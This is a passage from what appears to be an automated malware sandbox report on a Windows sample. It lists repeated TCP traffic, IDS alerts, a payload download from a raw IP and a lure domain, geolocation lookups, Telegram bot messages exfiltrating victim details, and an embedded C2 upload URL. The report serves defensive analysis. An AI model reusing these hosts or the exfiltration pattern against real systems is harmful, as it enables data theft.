                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80

                  Networking

                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: Malware configuration extractorURLs: http://amazonenviro.com/245_Aiymwhpjxsg
                  Source: unknownDNS query: name: api.telegram.org
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CE72C InternetCheckConnectionA,7_2_027CE72C
                  Source: global trafficTCP traffic: 192.168.2.5:53704 -> 208.91.198.176:587
                  Source: global trafficTCP traffic: 192.168.2.5:53579 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 05 Jan 2025 22:54:23 GMTAccept-Ranges: bytesETag: "185c71c3c45fdb1:0"Server: Microsoft-IIS/8.5Date: Mon, 06 Jan 2025 06:54:02 GMTContent-Length: 1161216
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53584 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49723 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53650 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53671 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53683 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53694 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53623 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53662 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53738 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53709 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53724 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53711 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
                  Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53636 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53696 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /image.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
                  Source: global traffic HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: amazonenviro.com
                  Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic DNS traffic detected: DNS query: mail.techniqueqatar.com
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:54:25 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:54:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:54:44 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, 